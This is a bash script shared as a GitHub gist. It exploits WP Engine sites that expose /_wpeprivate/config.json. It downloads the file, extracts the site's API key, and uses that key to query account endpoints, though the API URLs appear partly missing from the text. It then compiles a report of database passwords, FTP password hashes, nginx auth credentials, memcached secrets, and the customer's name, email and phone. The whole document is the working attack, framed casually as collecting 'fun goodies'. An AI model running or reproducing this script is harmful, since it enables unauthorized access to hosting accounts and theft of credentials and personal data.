Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET}
echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET}
curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json
WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g')
ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u)
echo -e ${BLUE}"\n-------------------------- Make 1st API Call to -----------------------"${RESET}
echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
curl -so $ACCOUNTNAME-site.json -k "$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"
echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to -----------------------"${RESET}
echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
curl -so $ACCOUNTNAME-customer.json -k "$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"
echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET}
echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt
grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt
jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/ //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt
echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt
echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt
jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' | sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt
jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo -e ${GREEN}
cat $ACCOUNTNAME-report.txt
echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.